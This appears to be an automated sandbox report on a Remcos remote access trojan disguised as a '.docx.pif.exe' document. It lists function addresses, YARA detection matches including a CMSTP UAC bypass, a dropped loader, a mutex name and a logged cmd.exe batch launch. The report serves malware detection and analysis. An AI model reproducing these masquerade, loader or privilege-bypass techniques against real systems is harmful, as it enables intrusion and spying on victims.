Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B56E680	17_2_00007FF64B56E680
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B58EE88	17_2_00007FF64B58EE88
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B565240	17_2_00007FF64B565240
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B56D250	17_2_00007FF64B56D250
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B569E50	17_2_00007FF64B569E50
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B567650	17_2_00007FF64B567650
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B56372C	17_2_00007FF64B56372C
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B587F00	17_2_00007FF64B587F00
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B566EE4	17_2_00007FF64B566EE4
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B591538	17_2_00007FF64B591538
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B562220	17_2_00007FF64B562220
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B58AA30	17_2_00007FF64B58AA30
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B564A30	17_2_00007FF64B564A30
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B568DF8	17_2_00007FF64B568DF8
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B56CE10	17_2_00007FF64B56CE10
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B58D9D0	17_2_00007FF64B58D9D0
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B5681D4	17_2_00007FF64B5681D4
Source: C:\Users\Public\xkn.exe	Code function: 22_2_00007FFAAC8B0EF5	22_2_00007FFAAC8B0EF5
Source: C:\Users\Public\ger.exe	Code function: 24_2_00007FF7E0A06054	24_2_00007FF7E0A06054
Source: C:\Users\Public\ger.exe	Code function: 24_2_00007FF7E0A01664	24_2_00007FF7E0A01664
Source: C:\Users\Public\ger.exe	Code function: 24_2_00007FF7E0A0596C	24_2_00007FF7E0A0596C
Source: C:\Users\Public\ger.exe	Code function: 24_2_00007FF7E0A072C0	24_2_00007FF7E0A072C0
Source: C:\Users\Public\ger.exe	Code function: 24_2_00007FF7E0A06EC8	24_2_00007FF7E0A06EC8
Source: C:\Users\Public\ger.exe	Code function: 24_2_00007FF7E0A067A0	24_2_00007FF7E0A067A0
Source: C:\Users\Public\ger.exe	Code function: 24_2_00007FF7E0A083D8	24_2_00007FF7E0A083D8
Source: C:\Users\Public\ger.exe	Code function: 24_2_00007FF7E0A06AE8	24_2_00007FF7E0A06AE8
Source: C:\Users\Public\ger.exe	Code function: 24_2_00007FF7E0A04050	24_2_00007FF7E0A04050
Source: C:\Users\Public\ger.exe	Code function: 24_2_00007FF7E0A04318	24_2_00007FF7E0A04318
Source: C:\Users\Public\ger.exe	Code function: 24_2_00007FF7E0A05128	24_2_00007FF7E0A05128
Source: C:\Users\Public\ger.exe	Code function: 24_2_00007FF7E0A09890	24_2_00007FF7E0A09890
Source: C:\Users\Public\ger.exe	Code function: 24_2_00007FF7E0A07C7C	24_2_00007FF7E0A07C7C
Source: C:\Users\Public\ger.exe	Code function: 24_2_00007FF7E0A09C74	24_2_00007FF7E0A09C74
Source: C:\Users\Public\ger.exe	Code function: 24_2_00007FF7E0A07670	24_2_00007FF7E0A07670
Source: C:\Users\Public\ger.exe	Code function: 24_2_00007FF7E0A02D70	24_2_00007FF7E0A02D70
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_045B74E6	31_2_045B74E6
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_045BE558	31_2_045BE558
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_045B8770	31_2_045B8770
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_045BE0CC	31_2_045BE0CC
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_0459F0FA	31_2_0459F0FA
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_045D4159	31_2_045D4159
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_045B8168	31_2_045B8168
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_045C61F0	31_2_045C61F0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_045BE2FB	31_2_045BE2FB
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_045D332B	31_2_045D332B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_045A739D	31_2_045A739D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_045B7D33	31_2_045B7D33
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_045B5E5E	31_2_045B5E5E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_045A6E0E	31_2_045A6E0E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_045BDE9D	31_2_045BDE9D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_04593FCA	31_2_04593FCA
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_045B6FEA	31_2_045B6FEA
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_045B78FE	31_2_045B78FE
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_045B3946	31_2_045B3946
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_045CD9C9	31_2_045CD9C9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_045A7A46	31_2_045A7A46
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_0459DB62	31_2_0459DB62
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_045A7BAF	31_2_045A7BAF
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_06421082	31_2_06421082
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_0646E678	31_2_0646E678
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_064486F5	31_2_064486F5
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_0645941F	31_2_0645941F
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_064545F5	31_2_064545F5
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_064585AD	31_2_064585AD
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_0645F207	31_2_0645F207
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_0644804C	31_2_0644804C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_06458195	31_2_06458195
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_06474E08	31_2_06474E08
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_06458E17	31_2_06458E17
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_06466E9F	31_2_06466E9F
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_06473FDA	31_2_06473FDA
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_0645EFAA	31_2_0645EFAA
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_06434C79	31_2_06434C79
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_06457C99	31_2_06457C99
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_0645ED7B	31_2_0645ED7B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_0643FDA9	31_2_0643FDA9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_06447ABD	31_2_06447ABD
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_0645EB4C	31_2_0645EB4C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_06456B0D	31_2_06456B0D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_0644885E	31_2_0644885E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_0643E811	31_2_0643E811
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_064589E2	31_2_064589E2

Dropped file seen in connection with other malware

Source: Joe Sandbox View

Dropped File: C:\Users\Public\Libraries\drbdmeyP.pif 7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301

Found potential string decryption / allocating functions

Source: C:\Users\Public\Libraries\drbdmeyP.pif	Code function: String function: 0040DEF0 appears 38 times
Source: C:\Users\Public\alpha.exe	Code function: String function: 00007FF64B573448 appears 90 times
Source: C:\Users\Public\alpha.exe	Code function: String function: 00007FF64B57081C appears 45 times
Source: C:\Users\Public\alpha.exe	Code function: String function: 00007FF64B57498C appears 50 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 045B4E10 appears 54 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 045B4770 appears 41 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 06455ABF appears 54 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 0645541F appears 41 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 04581E65 appears 34 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 06422B14 appears 34 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 04582093 appears 50 times
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: String function: 0298480C appears 865 times
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: String function: 02997CC8 appears 49 times
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: String function: 029844AC appears 69 times
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: String function: 02997E14 appears 45 times
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: String function: 029846A4 appears 242 times
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: String function: 02986650 appears 37 times
Source: C:\Users\Public\ger.exe	Code function: String function: 00007FF7E0A0D3D0 appears 56 times

Sample file is different than original file name gathered from version info

Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Binary or memory string: OriginalFilename vs #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1359129963.0000000026652000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1392779821.000000007FC80000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTruesight4 vs #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1359129963.00000000265F6000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1362819613.0000000027650000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTruesight4 vs #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTruesight4 vs #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1335815868.0000000002326000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1362819613.00000000276AC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe

Uses 32bit PE files

Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Yara signature match

Source: 31.2.colorcpl.exe.4580000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 31.2.colorcpl.exe.4580000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 31.2.colorcpl.exe.4580000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 31.2.colorcpl.exe.64218af.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 31.2.colorcpl.exe.64218af.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 31.2.colorcpl.exe.64218af.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 31.2.colorcpl.exe.64218af.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 31.2.colorcpl.exe.64218af.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 31.2.colorcpl.exe.64218af.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 31.2.colorcpl.exe.4580000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 31.2.colorcpl.exe.4580000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 31.2.colorcpl.exe.4580000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 31.2.colorcpl.exe.6420000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 31.2.colorcpl.exe.6420000.2.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 31.2.colorcpl.exe.6420000.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 31.2.colorcpl.exe.6420000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 31.2.colorcpl.exe.6420000.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 31.2.colorcpl.exe.6420000.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000001F.00000002.3702973204.0000000004580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000001F.00000002.3702973204.0000000004580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000001F.00000002.3702973204.0000000004580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000001F.00000002.3705302881.0000000006420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000001F.00000002.3705302881.0000000006420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000001F.00000002.3705302881.0000000006420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: Process Memory Space: colorcpl.exe PID: 7688, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.rans.troj.spyw.expl.evad.winEXE@53/21@51/1

Source: C:\Users\Public\alpha.exe

Code function: 8_2_00007FF64B5632B0 _get_osfhandle,GetConsoleScreenBufferInfo,WriteConsoleW,wcschr,FormatMessageW,GetConsoleScreenBufferInfo,WriteConsoleW,GetStdHandle,FlushConsoleInputBuffer,GetConsoleMode,SetConsoleMode,_getch,SetConsoleMode,GetConsoleScreenBufferInfo,FillConsoleOutputCharacterW,SetConsoleCursorPosition,GetLastError,GetLastError,

8_2_00007FF64B5632B0

Source: C:\Users\Public\ger.exe	Code function: 24_2_00007FF7E0A03F5C GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,CloseHandle,AdjustTokenPrivileges,CloseHandle,		24_2_00007FF7E0A03F5C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_04597952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,		31_2_04597952

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe

Code function: 0_2_02987F62 GetDiskFreeSpaceA,

0_2_02987F62

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe

Code function: 0_2_0299A174 CreateToolhelp32Snapshot,

0_2_0299A174

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe

Code function: 0_2_02996D58 CoCreateInstance,

0_2_02996D58

Source: C:\Users\Public\Libraries\drbdmeyP.pif

Code function: 3_2_004026B8 LoadResource,SizeofResource,FreeResource,

3_2_004026B8

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 31_2_0459AC78 OpenSCManagerW,OpenServiceW,CloseServiceHandle,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

31_2_0459AC78

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe

File created: C:\Users\Public\Libraries\PNO

Jump to behavior

Source: C:\Windows\SysWOW64\colorcpl.exe	Mutant created: \Sessions\1\BaseNamedObjects\Rmc-5MRRQ3
Source: C:\Users\Public\xkn.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2936:120:WilError_03

Source: C:\Users\Public\Libraries\drbdmeyP.pif

File created: C:\Users\user\AppData\Local\Temp\D2F6.tmp

Jump to behavior

Source: C:\Users\Public\Libraries\drbdmeyP.pif

Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\D2F6.tmp\D2F7.tmp\D2F8.bat C:\Users\Public\Libraries\drbdmeyP.pif"

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior

Source: C:\Windows\System32\taskkill.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "SystemSettings.exe")

Source: C:\Users\Public\Libraries\drbdmeyP.pif

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

